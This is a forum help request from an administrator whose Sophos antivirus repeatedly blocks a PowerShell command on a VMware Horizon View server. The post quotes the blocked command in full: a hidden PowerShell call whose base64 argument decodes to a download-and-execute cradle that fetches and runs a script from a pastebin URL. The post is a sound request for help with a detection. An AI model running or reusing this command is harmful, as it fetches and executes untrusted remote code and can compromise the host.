notpoetry
Contributor
Contributor

Sophos detecting Threats on view server powershell.exe - Exec_6a (T1059.001)

Hello,

We are getting over 100 detection's on our view server.

Command line:

This is what is executed and it's blocked by sophos

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBnADkAMwB3AFcASABrAFIAJwApAA=="

Any idea if it's related to view server in any way or it's something else?

This is also the reason why we wanted do what we noted here https://communities.vmware.com/t5/VMware-Horizon-Discussions/What-is-needed-for-RDP-access-only-we-w...

0 Kudos
0 Replies